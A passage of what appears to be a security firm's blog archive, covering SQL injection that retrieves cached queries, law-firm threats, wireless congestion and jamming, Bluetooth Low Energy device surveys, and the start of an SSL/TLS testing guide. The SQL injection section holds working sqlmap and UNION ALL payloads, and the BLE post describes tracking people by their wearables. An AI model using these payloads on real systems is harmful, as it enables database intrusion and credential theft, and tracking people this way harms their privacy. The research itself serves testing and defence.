Fig.2 - List of table names from the database appended to the normal results

MS SQL and Oracle

Both MS SQL and Oracle store cached queries that can be accessed by high privilege accounts. For an attacker, this allows us to not only select the current query, but also allows us to access other queries that have been executed as well. This could reveal credentials, function names, stored procedures as well as scheduled jobs that are being executed by the application. For the purpose of this blog however, I will focus on the ability to retrieve the current query.

MS SQL 2005+        SELECT st.text from sys.dm_exec_cached_plans cp
                    cross apply sys.dm_exec_sql_text(cp.plan_handle) st

Oracle              select SQL_TEXT from v$sql

It's important to note that both of these resources will have more than one row; in particular, when using blind SQL injection, each row could correspond to a variation on the injection.

For example, if SQLMap were to send 500 requests to retrieve the current query, then these cache tables will contain at least those 500 SQL queries. This poses a problem when performing blind SQL injection, because the number of rows increases with each request. One technique we can use is to include criteria in the custom sql-query search terms so that we select only one row, containing something we are expecting such as a particular ID.

To test this I changed the database in my application to Oracle and together with the vulnerable parameter we can craft a SQLMap command as follows.

sqlmap -u "http://localhost/test/vuln.aspx?album=513"
--sql-query="SELECT SQL_TEXT from v$sql
where SQL_TEXT like '%513%'
and SQL_TEXT not like '%v$sql%' and ROWNUM = 1"

Here we attempt to select just the one row from the cache tables that contains our ID 513 but doesn't contain references to the cache table itself, such as v$sql. This is so that we don't select all of the queries that SQLMap performs, which could number in the hundreds or even thousands. The result is similar to the earlier examples, except we are now able to retrieve the original query without returning the injected SQL statements that SQLMap executes.


Fig.3 - SQLMAP output showing the extracted query

This produces the following result:

select title from (
select asin,title
from album
where rank=513) where asin like 'B0000%' -- Misc Comment

With both MS SQL and Oracle, we can go a step further and select other queries that have been executed which can allow us to examine the other database calls that an application makes. This can include the use of stored procedures, functions, and scheduled tasks as well as the possibility to retrieve information such as credentials for an application if they are selected from a table.

Knowing how to perform the UNION ALL on this vulnerable web page, we can use the following payload to query the Oracle v$sql table and return all of the queries that have been executed recently. Since this application is quite simple there isn't much that stands out; however, on a real application this table would contain a lot of different queries, possibly dating back days, weeks or even months.

http://localhost/test/vuln.aspx?album=513+union+all+select+'B000000',SQL_TEXT+FROM+v$sql

As we can see from the results below, there is quite a lot of potentially useful information here and the queries seem to persist for quite some time.


Fig.4 - Contents of the v$sql table on an Oracle DB.

Future Research

As well as enabling a greater understanding of SQL injection vulnerabilities, I hope that this technique may also enhance the current SQL injection tools available. Using these methods, it may be possible for a tool to extract the query first and use the results to modify the behaviour of the tool making them more efficient.

I intend to do more research to try to identify other methods of retrieving this information with lower privilege accounts, and also to extend the list of databases to gain more complete coverage of this technique.

Contact and Follow-Up

Aaron is part of our Assurance team in Context's London office. See the Contact page for how to get in touch.

Breaking the law: the legal sector remains an attractive target; why not turn cyber security into an opportunity?


The legal sector will remain an attractive target for the full spectrum of threat actors: cyber-criminals, hacktivists and state-sponsored groups. Unsurprisingly, this is due to the wealth of sensitive data held within the industry: patent data, merger and acquisition information, negotiation information, protected witness information. The scope is vast and not limited to this list. Legal firms are the equivalent of a pot of gold for any of these groups.

For example, criminals might target you because they hope you hold significant amounts of money in your accounts (both corporate and personal). Hacktivists might target you because of your work in a particular area of law, or because of specific clients that you represent. State-sponsored groups may target you to obtain sensitive merger and acquisition information, or compromise your website in order to target a refined element of your client base. The problem is not going away.

Cyber security is often seen as an inconvenience: a substantial cost that you will never see a return on investment for. However, this is changing. In a world where contracts are won and lost on the basis of very small margins, every differentiator counts. Information security and protection of client data is increasingly seen as a key differentiator.

The government sponsored Cyber Essentials scheme is a great avenue for this. It gives businesses the chance to obtain an accreditation against an assurance framework that seeks to mitigate the most common cyber threats. This accreditation will demonstrate to your customers that you have taken essential precautions in order to better protect their data; an attractive selling point. Context is an approved accreditor of this scheme.

Employee awareness is also essential. By giving employees an awareness of the cyber threat, along with practical tips for how to better protect themselves and the organisation, you can engender a real cooperative approach to security. Security is a shared responsibility across an organisation, and by empowering staff with knowledge you increase your ability to detect a compromise quickly, whilst enriching your employees with new skills and information. Context offers threat awareness briefings to staff, which give a high level overview of the threat but also cover how employees might be impacted directly, for example by ransomware or phishing/spear-phishing attacks.

The threat landscape is continually expanding and ever changing. Increasingly, we are seeing criminal groups targeting corporate entities as opposed to just speculatively targeting individuals for financial gain. The malware used in these attacks is increasingly becoming more sophisticated and covert. In part, this is due to the proliferation of sophisticated malware via underground forums. In addition, hackers for hire, a worrying development, allow nation states with limited capabilities in this area to rapidly acquire the tools to deploy cyber-attacks in order to obtain intellectual property and sensitive data. Unfortunately, law firms will be at the top of the list for these groups for all the reasons outlined at the start of this post. Stay ahead of the curve; seize the opportunity to be a leader within your sector; protect your clients and your interests whilst attracting some new business along the way.


Tom is a part of our Response team in Context's London office, please refer to the contact page to get in touch.

Wireless Gridlock in the IoT



“What good is a phone call when you are unable to speak?”

Introduction

When people mention the Internet of Things (IoT) and congestion they’re likely referring to novel solutions to urban traffic control, not the less discussed fragile and limited radio spectrum, which presents its own security risk at a time when systems are becoming increasingly dependent on it.  

The explosive growth in home, wearable and vehicular wireless devices has not been matched by a proportionate growth in the radio spectrum bands available to accommodate them. This dilemma is creating a growing congestion problem that owners of wireless networks, bandwidth-hungry teenagers and value baby-monitors know only too well. It presents a genuine and growing security issue for the availability of critical information stored in the cloud and dependent on the already vulnerable and limited RF spectrum to convey it. Denial of service is no longer a nuisance; it is lethal to modern systems and economies.

Discrete wireless networking technology (Bluetooth, WiFi, Zigbee) is proliferating at an ever increasing rate right across industry sectors, much faster than spectrum management or standards bodies can keep on top of or practically test. The ubiquitous Industrial, Scientific and Medical (ISM) radio band at 2.4GHz in particular is heavily oversubscribed due to its unlicensed nature and, at the present rate of growth of 2.4GHz transmitters and networks, could become all but unusable for priority systems in densely populated areas in the future.

The crux of the problem is that the oversubscribed ISM bands are unmanaged, so whilst your company might exercise diligent planning of your wireless network(s), the growing number of local devices within range will pump out RF energy into the same narrow slice of spectrum without a care for your planning - or your devices. In addition, vendors will be more than happy to tell you their wireless device 'just works' and gloss over the critical issue of the overcrowded, unmanaged RF spectrum it relies upon. Devices need only comply with the radiation regulations for your country, set by ETSI in Europe, and are not required, or practically tested, to work in harmony with other devices. Value baby-monitors are nicknamed 'RF jammers' for good reason.

Harmony through design

Wireless standards like IEEE 802.11 (WiFi) were designed with high capacity and congestion in mind [1]. Features such as engineered channel spacing (guard channels), distinct channels (13 channels in the UK), and agile modulation techniques like Direct Sequence Spread Spectrum (DSSS), Frequency Hopping Spread Spectrum (FHSS) and Orthogonal Frequency Division Multiplexing (OFDM) allow efficient sharing of the limited spectrum whilst providing the high data rates consumers demand. Telecommunications authorities like ETSI in Europe further restrict device power output to 20dBm (0.1W), severely limiting the impact of any single device.

These advanced design features do indeed allow multiple systems to share the same channel, but they won't provide indefinite harmony. The scale of the IoT will stretch them to breaking point.


Bluetooth (IEEE 802.15.1) is marketed as a distinct communications technology for portable devices but operates in exactly the same 2.4GHz band as WiFi. It is designed to fail gracefully when it cannot communicate on a channel, so many users are oblivious to interference. Despite Bluetooth using frequency hopping modulation (FHSS) and WiFi using a different spread spectrum technique (DSSS), the two incompatible standards are still capable of interfering with each other, resulting in bit errors and reduced speeds [5].

Why your WiFi is slow… and getting slower

Despite advanced interference counter measures, the sheer quantity and variety of devices from wristwatches to CCTV competing for bandwidth in the narrow slice of ISM spectrum, especially in cities, is causing increased bit error rates (BER) through collisions and packet retransmissions which manifests itself as slow WiFi and even WiFi rage[2].

Channel management by users is voluntary and, even if done well, is likely at odds with your neighbours' channel management plan. Even if you harmonise channels in your office with additional spacing (a DSSS signal overlaps the two channels either side of its own), sooner or later someone or something will be on 'your' channel(s). Hopefully they'll be compliant with ETSI regulations, but even then there's a healthy limit (it's 3) to the number of independent DSSS signals in the same location, which can be calculated when you know how many bits are in the spreading sequence. The 802.11 standard has an 11-bit spreading sequence which needs 30MHz spacing between carriers. Any closer and they're interfering. The amount of interference will be proportionate to the amount of overlap and signal power [3]. Having three or more signals on the same channel won't cause anarchy, but it will reduce performance by a factor determined by the power of the interfering signals, which may well be enough to impact the availability of your critical information.
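That back-of-the-envelope reasoning is easy to check numerically. Here's a sketch of our own, assuming the standard 5MHz channel spacing and a 22MHz-wide DSSS signal:

```python
# 2.4GHz Wi-Fi channel centres (UK channels 1-13) and a simple overlap test:
# two 22MHz-wide DSSS signals interfere when their centres are closer than
# the signal width.
CENTRES_MHZ = {ch: 2412 + 5 * (ch - 1) for ch in range(1, 14)}

def overlaps(ch_a, ch_b, width_mhz=22):
    return abs(CENTRES_MHZ[ch_a] - CENTRES_MHZ[ch_b]) < width_mhz

clear_of_ch1 = [ch for ch in CENTRES_MHZ if not overlaps(1, ch)]
print(clear_of_ch1)  # [6, 7, 8, 9, 10, 11, 12, 13]
```

Channel 6 is the first channel clear of channel 1, which is exactly why the familiar non-overlapping channel plan is 1, 6 and 11.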

Congestion has already spawned a market in products designed to beat the traffic either through intelligent multi-path antenna design (MIMO routers) or cruder high gain antennas designed to ‘boost’ your signal usually at the expense of other users – which is allowed because it’s unmanaged spectrum after all. Vendors shouldn’t exceed ETSI radiation regulations or deliberately interfere with other’s use of the spectrum as that would be an offence under the (UK) Wireless Telegraphy Act (WTA).

The WiFi’s slow, so what?

In the information security triangle of Confidentiality, Integrity and Availability, interference presents a real threat to the availability of data and services, increasingly cloud based. Not being able to stream a HD movie is a ‘first world problem’ but not being able to activate the remote lock on your house or car or access your critical data or system when you need it is a more serious issue with real world consequences.

  • Cars fitted with convenient wireless security systems have for some time now been targeted with deliberate RF interference by thieves. Using a cheap jammer that requires no technical knowledge or skill to operate, the thief jams the lock signal as the owner leaves the vehicle [4].
  • The surge in affordable drone usage in the ISM band has seen a new, expensive phenomenon called 'fly-aways', in which a drone fails to communicate with its controller [6]. RF interference is a known issue, which is understandable: at 20dBm (the ETSI limit), a 2.4GHz signal will propagate only a few hundred metres through free space before it is too weak to receive with normal receivers. The practical maximum range of a drone will vary greatly between a quiet rural environment with a low RF noise floor and a noisy, cluttered city, where the drone's signal has to contend with attenuating obstacles, signal multipath and other co-located systems on the same band.

  • An unnamed UK intensive care hospital invested in an 802.11 VoIP staff communications system which staff rely on to contact each other - often in an emergency. The devices are clients to a building-wide 802.11 network which shares not only the unmanaged spectrum with non-critical networks, but also the very same channel with a much higher bandwidth patient entertainment network resulting in occasional critical communications failure (or jittery cartoons depending on your POV). Basic channel management would help but a better solution for a critical system would be dedicated, licensed, spectrum instead of the Wild West that is the ISM band.

If you run a business where wireless systems feature heavily then you're vulnerable to a physical denial of service in the form of unintended or deliberate interference (jamming). (You're also using more power, as it costs more wattage to send a packet between computers via WiFi than by Ethernet.) An RF jammer can be assembled or bought for very little, and the growing hobbyist Software Defined Radio market has seen the price of entry-level transceivers capable of transmitting across licensed and unlicensed bands fall drastically; coupled with an equally affordable signal amplifier and directional antenna, these can deny wireless communications at long range. This means the barrier to entry into the previously exclusive world of Electronic Counter Measures (military jargon for radio jammers) has fallen, and trouble will follow. Expect and plan for interference, deliberate or otherwise.


                                                                Representative SDR Jammer with power amplifier

Solutions

Faced with this dilemma, what can you do to stop the hordes of mushrooming IoT devices, and the emerging threat from attackers armed with powerful SDR jammers, from compromising the availability of your critical information?

Thankfully, standards bodies are developing future standards to address congestion and capacity issues, but in the meantime here’s a check-list of tips to help you enjoy interference-free wireless networking:

  • Plan for radio failure. Have an alternative ready, ideally an Ethernet cable into your network.
  • If you are going to put your business in the cloud, access it via a reliable, wired, route.
  • For mobile users of critical and/or valuable systems, ask yourself if using the unmanaged spectrum is the best choice. WiFi might well be faster than 3G, but it’s a free-for-all, unlike the carefully managed GSM bands which cost telecoms companies billions. WiFi is cheaper for a reason.
  • De-conflict your local spectrum. Have a scan with one of the many smartphone apps like Wifi Analyzer for Android or airodump-ng for Linux which will reveal your 802.11 neighbours and note their WLAN channels. Get your wireless base stations on a channel as far from other systems as possible. Do the same for Bluetooth. Repeat periodically.
  • Take an interest in the frequency bands before you buy another convenient ‘wireless’ device. Favour devices which use less common bands such as the higher 5.8GHz ISM band used by 802.11n. Aim for diversity of your spectrum footprint rather than having them all sit in the same overcrowded 2.4GHz band waiting for trouble to come your way.
  • Pay attention and investigate incidents of slow speeds. As well as being an indicator of someone hogging all the bandwidth, it is also a symptom of an interfering system causing increased bit errors and packet retransmissions on your channel.
  • If all else fails, move to the Outer Hebrides, but be warned there's a Radar test facility already there...


The Emergence of Bluetooth Low Energy




Introduction

This blog is about Bluetooth Low Energy (BLE), which is the relatively new, lower-power version of the Bluetooth protocol. BLE was introduced in version 4.0 of the Bluetooth Core Specification, which was released in June 2010. The idea was to redesign the Bluetooth protocol for low power consumption and cost, for use in a new set of applications. Crucially, BLE is not compatible with traditional Bluetooth, although the specification does allow for devices to implement either or both of the protocols. As we’ll show, the changes made to BLE allow it to work in a very different manner to traditional Bluetooth.

It’s a technology that piqued the interest of our Research team, purely because of one interesting application: iBeacons. That initial spark has resulted in a few different strands of work, all of which are covered here.

In the beginning – iBeacons

All of this started when Paul in our Research team read about iBeacons online, and bought two cheap ones on Amazon. After a while he brought them into the office for us to play with. An iBeacon is a BLE device with one function: to constantly broadcast BLE packets containing just a serial number that uniquely identifies the iBeacon.


As the name suggests, iBeacons are an Apple protocol, and many of the early applications are very iOS-centric. The following section covers the technology in more detail, but using BLE means that they can run from a coin-cell battery for a couple of years, something that wouldn't have been possible with traditional Bluetooth.
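The iBeacon ‘serial number’ has a fixed layout inside the manufacturer-specific advertising data: Apple’s company identifier, a two-byte iBeacon marker, a 16-byte proximity UUID, two-byte major and minor values, and a one-byte calibrated TX power. A minimal parsing sketch (the sample frame bytes are invented for illustration):

```python
import struct

def parse_ibeacon(mfr_data: bytes):
    """Parse Apple iBeacon manufacturer-specific data.

    Layout: company ID 0x004C (little-endian), type 0x02, length 0x15,
    then 16-byte UUID, 2-byte major, 2-byte minor, 1-byte measured TX power.
    """
    if len(mfr_data) != 25 or mfr_data[:4] != b"\x4c\x00\x02\x15":
        return None  # not an iBeacon frame
    uuid = mfr_data[4:20].hex()
    major, minor = struct.unpack(">HH", mfr_data[20:24])  # big-endian shorts
    tx_power = struct.unpack("b", mfr_data[24:25])[0]     # signed dBm at 1m
    return uuid, major, minor, tx_power

# Made-up frame: all-zero UUID, major 1, minor 2, TX power -59dBm
frame = bytes.fromhex("4c000215") + bytes(16) + bytes.fromhex("00010002c5")
print(parse_ibeacon(frame))
```

The major and minor values let a deployment reuse one UUID across many beacons, for example one UUID per shop chain and a major/minor pair per store and aisle.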

To make use of an iBeacon, you typically need a mobile application that looks for them, and knows what to do when it finds them. In the UK, both BA and Virgin have added iBeacons to their airport lounges, so the application that is already used to show a boarding card can detect when you walk into the lounge, and tell you the WiFi password for that day.

A number of companies and organisations are already using or experimenting with iBeacons, for example Major League Baseball, Apple themselves, House of Fraser, Regent Street (the BBC have a video) and Waitrose.

Whilst location-based services aren’t new, using BLE means that location-aware applications can work simply by receiving BLE packets, which have a longer range than RFID, but don’t consume as much power to scan for as WiFi or GPS.

Google quietly introduced a similar mechanism in Android 5.0, with Android Trusted Places and Trusted Devices. This allows your Android device to automatically unlock when it’s in a trusted place, or when it is in range of a trusted device, such as a Bluetooth device.

Another novel BLE application is Google Physical Web, their iBeacon-like specification to push out a URL via BLE packets. Implementing a URIBeacon, as they are called, is straightforward. This is particularly true if you make use of ARM’s mbed framework, which has sample code for many BLE applications, including URIBeacons. A free mbed account lets you write and compile code from the mbed web interface.

Thankfully many of the initial applications of iBeacons require you to be using a specific application already. One of the first questions on the Google Physical Web introduction is “will you be pestering people with alarms?” Encouragingly, they say that “a core principle of this system is no proactive notifications” (their emphasis). It wouldn't be too surprising, however, to see a handset manufacturer supplying devices with a pre-installed iBeacon app that allows its partners to push location-based adverts at people. You can at least turn off Bluetooth on your phone.

Whilst iBeacons were the first BLE technology we came across, there are a surprisingly large number of devices out there that are already using it.

Other applications

Later sections cover the work we've done to survey BLE devices already in use, some of which are surprising, but many that people would expect. One of the most topical applications for BLE is in wearable technology and fitness trackers, about which there is a lot being written. As these devices are small and low-powered and only need to send regular updates, BLE is an obviously suitable protocol for them to use.


Whilst many people are aware of fitness trackers (e.g. FitBit, Jawbone) and heartrate monitors, and Bluetooth headsets aren't new, not many people would guess at combining the two to produce headphones that measure your pulse from inside your ear like the Jabra Pulse does.

The Apple Watch presumably supports it, but we can’t tell from the technical specifications as they only state that it supports Bluetooth 4.0, which includes BLE but also traditional Bluetooth.

And finally, if you’re looking to “enrich your sleep experience”, there’s always the Withings Aura.

Before we cover the work we've done on BLE, it’s worth taking a look at some of the important aspects of the technology.

The technology and why it matters

History

We’re currently on version 4.2 of the Bluetooth Core Specification, which means there have been two point releases since BLE was first introduced. Interestingly, the recent amendments seem to be backtracking on some of the original design principles of BLE: to implement light-weight encryption and keep packet sizes down. In fact they are entirely contrary, as they introduce longer packet lengths and Diffie-Hellman key exchanges.

Devices labelled as “Bluetooth Smart” support BLE, and those labelled as “Bluetooth Smart Ready” support both traditional Bluetooth and BLE.

Spectrum

BLE runs at 2.4GHz, sharing the ISM band with WiFi and regular Bluetooth. As we've written recently, this is a very congested section of the spectrum.

BLE’s power output is only 10mW (10dBm), a tenth of the power of 802.11 WiFi (100mW / 20dBm), but it is able to co-exist (most of the time…) in the spectrum with its more powerful neighbours through a variant of Bluetooth’s Frequency Hopping Spread Spectrum (FHSS) modulation. At that power, the range is restricted to less than 100m in an open area.
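The mW and dBm figures above are the same quantities on linear and logarithmic scales; the conversion is simply:

```python
import math

def mw_to_dbm(p_mw: float) -> float:
    """Convert a power in milliwatts to dBm (decibels relative to 1mW)."""
    return 10 * math.log10(p_mw)

print(mw_to_dbm(10))   # BLE's 10mW  -> 10.0 dBm
print(mw_to_dbm(100))  # WiFi's 100mW -> 20.0 dBm
```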

The BLE spectrum is divided into 37 data channels and 3 advertising channels. Established BLE connections hop across the data channels according to the channel map, which is agreed in the handshake protocol.
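The channel-to-frequency mapping is fixed by the Core Specification: channels are 2MHz wide, and the three advertising channels sit at 2402, 2426 and 2480MHz, deliberately placed away from the most popular WiFi channels. A small sketch of the mapping:

```python
def ble_channel_freq(ch: int) -> int:
    """Centre frequency in MHz for a BLE channel index.

    Channels 0-36 are data channels; 37-39 are the advertising channels,
    which sit at 2402, 2426 and 2480 MHz to avoid the busiest WiFi channels.
    """
    if ch == 37:
        return 2402
    if ch == 38:
        return 2426
    if ch == 39:
        return 2480
    if 0 <= ch <= 10:
        return 2404 + 2 * ch          # data channels below channel 38
    if 11 <= ch <= 36:
        return 2428 + 2 * (ch - 11)   # data channels above channel 38
    raise ValueError("BLE channel index must be 0-39")

print([ble_channel_freq(c) for c in (37, 38, 39)])  # [2402, 2426, 2480]
```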

Advertising packets

Crucial to the operation of BLE, and important to following sections of this blog, is the fact that BLE devices constantly broadcast undirected advertising packets in order to advertise their presence. These packets are broadcast across the three advertising channels, and the first step of connecting two BLE devices is for one to respond to the other’s advertising packets.

Sometimes the advertising packets contain the device name, which may be unique such as the “Garmin Vivosmart #12345678” or the Samsung "GALAXY Gear (1234)", or are even user-chosen such as “Jules' Watch”. The advertising packets contain fields for manufacturer-specific data, including universally-unique IDs (UUIDs) for different services. Some of these UUIDs start with a manufacturer ID. For example, FitBit Charge HR fitness trackers all send the UUID "adabfb00-6e7d-4601-bda2-bffaa68956ba".
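These name and UUID fields arrive as a series of simple length-type-value structures within the advertising payload, so pulling them out is straightforward. An illustrative parser (the sample payload is made up; 0x01 is the Flags AD type and 0x09 is Complete Local Name):

```python
def parse_ad_structures(payload: bytes):
    """Split a BLE advertising payload into (AD type, data) pairs.

    Advertising data is a series of structures, each consisting of a
    one-byte length, a one-byte AD type, then (length - 1) bytes of data.
    """
    out = []
    i = 0
    while i < len(payload):
        length = payload[i]
        if length == 0:
            break  # early termination / zero padding
        ad_type = payload[i + 1]
        out.append((ad_type, payload[i + 2 : i + 1 + length]))
        i += 1 + length
    return out

# Flags = 0x06, then a Complete Local Name of "Paul"
ads = parse_ad_structures(b"\x02\x01\x06\x05\x09Paul")
print(ads)  # [(1, b'\x06'), (9, b'Paul')]
```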

Many of these fields can be used to identify a product from a particular manufacturer, a particular model of product, and sometimes a particular device, which negates the effort made to disguise devices by randomising the MAC address.

Identifying devices

Like other network protocols, BLE relies on identifying devices by their MAC addresses. As they broadcast advertising packets constantly, any tool that logs BLE packets could be used to track a specific device. This issue is addressed in a blog from the Bluetooth SIG.

All BLE devices must have at least one public address or random address. Random addresses can be either a static address that is fixed for a power cycle, or a private address that is only resolvable with a shared key. The above blog says that random addresses mean that an attacker “…would not be able to determine that the series of different, randomly generated MAC addresses received from your device actually relates to the same physical device”.

Contrary to the intentions of the SIG, most of the devices we've seen have a random MAC address, in that it’s not possible to identify the vendor from the beginning of the address, but it’s still fixed. A test FitBit has had the same MAC address since we started this work, even though it has completely run out of battery once. Some manufacturers have gone with public addresses; for example, all the devices from Nike and MI that we've seen have Nike or MI MAC addresses (starting with 9C:A1:34 and 88:0F:10 respectively).
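For random addresses, the Core Specification encodes the subtype in the two most significant bits of the address (0b11 for static, 0b01 for resolvable private, 0b00 for non-resolvable private), so a logger can classify what it sees. A sketch, assuming the link layer has already flagged the address as random rather than public (that flag lives in the advertising PDU header, not in the address itself):

```python
def random_address_subtype(mac: str) -> str:
    """Classify a BLE random address by the two most significant bits of
    its most significant byte, per the Core Specification."""
    msb = int(mac.split(":")[0], 16)
    top_two = msb >> 6
    return {
        0b11: "static",                  # fixed for at least a power cycle
        0b01: "resolvable private",      # changes; resolvable with a shared key
        0b00: "non-resolvable private",  # changes; not resolvable
    }.get(top_two, "reserved")

print(random_address_subtype("C4:3A:12:00:01:02"))  # 0xC4 = 0b11... -> static
```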

We've seen some devices that are clearly changing their MAC address for successive advertising packets. They are sometimes easy to identify as they have a counter that increments the last few bytes of the address, and often send out constant identifying information.

Authentication and encryption

Like regular Bluetooth, BLE supports a number of different schemes for pairing two devices. Version 4.2 of the specification introduced Secure Connections, which supports Elliptic Curve Diffie-Hellman for key exchange. Prior to 4.2, devices can choose between Just Works, Passkey Entry and Out of Band. Just Works is effectively no authentication, which at first seems like a terrible idea, but how do you authenticate to a device that doesn't have a screen or any input mechanism? If we care about security and privacy, we have to trust that the manufacturer has implemented their own.

The main purpose of pairing is to exchange encryption keys and set-up parameters. BLE does support encryption implemented in the protocol specification, but it is not always used in the products we've seen. Some vendors seem to have chosen to implement their own encryption of the underlying data, rather than rely on BLE security.

Mike Ryan’s work has shown that if you can capture the initial handshake, breaking some of the authentication schemes to recover the encryption key is not too hard, nor is figuring out the channel-hopping map. The opportunity to capture the handshake is rare, however, as you typically only have to pair devices once.

Support in mobile phones

BLE has been supported by the major phone operating systems for some time now, for example since iOS v5, and Android 4.3.

Privacy

These devices, in their normal operation, broadcast constantly. The range is supposed to be around 100m in an open area, but as previous research has shown (albeit for regular Bluetooth), and from what we've seen in surveying for devices, devices can be detected at a greater range due to anomalies affecting RF propagation, such as ducting. As mentioned above, the random MAC addresses are still largely fixed.

Whilst it was done for traditional Bluetooth, the “Bluesniping” work showed that with a high-gain (e.g. 19dBi), directional antenna it was possible to pick up regular Bluetooth packets at distances of half a mile. The same principle would work for BLE and the potential intercept range can be calculated using a free space loss model with losses to represent window panes and walls.
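A rough link budget based on the standard free-space path loss formula illustrates why such ranges are plausible. The 19dBi antenna gain comes from the Bluesniping work above; the -90dBm receiver sensitivity is an assumed figure for illustration, and real-world losses from walls and windows would need to be subtracted:

```python
import math

def fspl_db(distance_m: float, freq_mhz: float) -> float:
    """Free-space path loss in dB: 32.44 + 20*log10(f_MHz) + 20*log10(d_km)."""
    return 32.44 + 20 * math.log10(freq_mhz) + 20 * math.log10(distance_m / 1000)

tx_dbm = 10           # BLE transmit power
rx_gain_dbi = 19      # high-gain directional antenna (per Bluesniping)
sensitivity_dbm = -90 # assumed receiver sensitivity

for d in (100, 500, 1000):
    rx = tx_dbm + rx_gain_dbi - fspl_db(d, 2440)
    verdict = "above" if rx > sensitivity_dbm else "below"
    print(f"{d:5d} m: received {rx:6.1f} dBm ({verdict} sensitivity)")
```

Even before accounting for obstacles, the received signal at 1km sits comfortably above the assumed sensitivity, which is consistent with the half-mile Bluesniping result.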

If I have an easy way to scan for these devices, and can attribute a device to a particular person such as a celebrity, your CEO or the police officer leading an investigation against your company, then I can easily tell when they’re nearby. Many of the available fitness trackers are waterproof and measure sleep, so there’s no need to ever take them off. Some stories are already starting to appear about organisations with concerns about wearable devices, for example the Chinese military.

Much has been written lately about the positive and negative effects of wearable technology and the “quantified self” (for example here and here). What is obvious is that many of these devices contain very personal information about someone's health and patterns of life, which can lead to amusing measurements, but also represent a wealth of data about an individual. Whilst many people are very happy to publish such information to social media, others would be very protective of it.

Much like our previous work on IoT devices, it does seem like many manufacturers of wearable technology are keen to get their products to market as quickly as possible, with security sometimes tacked on as an afterthought. As far as fitness trackers are concerned, there has already been some good work on reverse engineering the protocol used by the Nike Fuelband.

Scanning for BLE devices on a laptop

The first thing we wanted to do was to scan for devices and have a look at the traffic. Two of the common BLE System-on-Chip products out there are the Texas Instruments CC2540 and the Nordic Semiconductor nRF51. We went for the latter, which is available on a £30 development dongle that comes with a free sniffing application and has APIs to develop applications in C# and Python. For £50, Nordic also produces a development kit that can accept Arduino Uno-compatible shields and can run off battery power.


Both the development dongle and kit feature Segger chips that make the devices appear as mass storage devices, so you can programme them simply by dragging the compiled code onto the USB drive, and rebooting it. Compared to developing for embedded devices that require extra hardware programmers and debuggers, this is very easy. This shows how the vendors of the chips, such as Nordic, are trying hard to help people quickly develop products and get them to market.

The free Nordic sniffer lists all of the devices it can see, and allows you to launch Wireshark to collect traffic from a specific device. It doesn't log the devices seen, or store any of the data that it collects. We wrote an application in C# that scans for advertising data, and sends out scan requests to identify devices. It’s a console application that logs all the devices it sees into a database, along with all of the data from the advertising packets and scan responses. When it closes, the application does some analysis on the database to summarise the identified devices, to look for different devices that send the same field values, and to look for repeated devices.

We've used the scan data to improve how many devices the scanner identifies, based on unique service data or UUIDs. For example, the Garmin Vivosmart fitness trackers have a device name that contains what looks like a unique ID. TomTom’s smart watch has a name chosen by the user. FitBit devices all transmit a services UUID that seems unique per range of models.

Survey results


The first thing to say is that there are a lot of devices out there. The Nordic dongle that we used for the survey has a short antenna-track on its PCB. Running from my desk on the fourth floor of an office on an averagely busy road on the Isle of Dogs, we were surprised at how many devices are out there, and not just amongst our geekier-than-average colleagues.

It was pretty much as we'd expect, with a couple of outliers. There's a wide selection of fitness trackers out there, primarily from FitBit, Jawbone and Garmin. There are also a lot of heart-rate monitors, a few bicycle devices and the odd Galaxy Gear. We've seen all the devices mentioned in this blog at least once.

We also saw lots of iPhones (they have a field that begins with the Apple manufacturer ID), or possibly a few iPhones that change their MAC address and the data they send out very frequently. A small proportion of these advertising packets are for AirDrop, which we identified by looking into the format of those packets. More on that in another blog, maybe.

There was also one mysterious device that is very common (about two-thirds as common as iPhones) but we don’t know what it is. It's identifiable by the fixed UUID "35ee33ea68c74fbd868244eeb3df13e2".

Scanning for devices on a smart phone

Obviously the laptop isn’t entirely practical, so we also wanted an Android application to scan for devices. Some exist already (the Nordic one is pretty good), but we couldn’t find one that logs all the devices it sees, or tries to identify devices, or logs their location. So we decided to write our own.

Helpfully, Google published a sample application that scans for LE devices, and requests their GATT profiles. It hadn't been updated to use the latest version of the Android API for Bluetooth LE, so we had to update it. To make the application that we wanted, which is a decent proof-of-concept application for surveying devices, we added functionality to make it run as a background service, to store its data in a database, to log the location of each device it sees, to export its database to the SD card, and to plot the location of the device on a Google Maps plugin. We even made an icon, although it did lead to lots of arguments.


Survey results

We looked for devices around our office, and on our commutes. A daily commute on the Central and Jubilee lines from Zone 4 to Canary Wharf detects around 100 devices.

To give you an idea as to how many of these devices are out there, half an hour near Canary Wharf station for lunch detected 149 devices. They included 26 FitBits, 2 Jawbones, a couple of Nike products, one Estimote iBeacon (we're not sure where) and an Alcatel Pop C5, and a lot of iPhones.

Try for yourself

This application will be available here on the Google Play Store from Friday 22nd May. It works fine on our test phones (a Nexus 4 and a Sony Xperia Z3), but it’s very much a proof of concept. It requires the new BLE libraries from Android 5.0. 

Please let us know if you see anything interesting, or find any terrible bugs.

Conclusions

BLE is not a new technology, but its adoption for certain applications is novel. Compared to traditional Bluetooth, it enables a new means for electronic devices to constantly communicate with each other. Whilst wearable technology and other applications are becoming increasingly popular, do many of the owners of these devices realise that they broadcast constantly?

These broadcasts can almost always be attributed to a unique device, contrary to measures taken in the protocol to anonymise devices by randomising the MAC addresses. Depending on the product, some of these broadcasts can also be identified to a particular manufacturer, or the product model, or an individual product.

Scanning for these broadcasts is easy either with cheap hardware or with a smartphone. This allows us to identify and locate particular devices, which for devices such as fitness trackers that are designed to be worn all the time, means that we can identify and locate a person, to within a limited range.

There are clear implications for privacy, just as there are ways that this technology could be exploited for social engineering and crime.

All of this is a work in progress - we'd like to do more on the Android application, and we're keen to write a battery-powered scanner to run from the development kit. We've had a look at the security of some of the wearable devices, and may well write a future blog on some of our findings.

Follow Up and Contact

Scott is a part of our Research team in our London office.

Manually Testing SSL/TLS Weaknesses

The Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols aim to provide client and server systems with a means of establishing an encrypted communication channel. Though best known for putting the "S" in HTTPS, their use is not limited to web-based systems; they are also commonly used as a wrapper for other unencrypted services such as FTP.

While SSL has historically been the dominant protocol for securing the Internet, a rash of attacks in recent years has prompted a migration to its successor, TLS. This alone is not enough to guarantee a secure connection, however. TLS has also been found to have weaknesses and careful configuration is needed to avoid exposing communications to compromise from a network-based attacker. SSL/TLS flaws are widespread; SSL Pulse estimates that over three-quarters of the SSL/TLS deployments currently in use by the top one million websites are inadequately configured.

This post presents a review of the main SSL/TLS (mis)configurations and simple ways to test your system's susceptibility. The following configurations and attacks are considered:

  • SSLv2 Support
  • SSLv3 Support
  • Cipher Suites
